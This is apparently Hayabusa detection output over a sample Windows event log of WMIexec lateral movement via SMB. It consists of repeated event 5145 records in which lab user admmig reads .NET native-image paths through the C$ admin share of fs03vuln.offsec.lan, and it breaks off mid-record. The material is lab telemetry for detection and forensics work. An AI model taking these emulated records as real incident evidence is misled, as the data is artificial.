0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\ddb52221ad0200b7c2e0a308e47d5c7c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 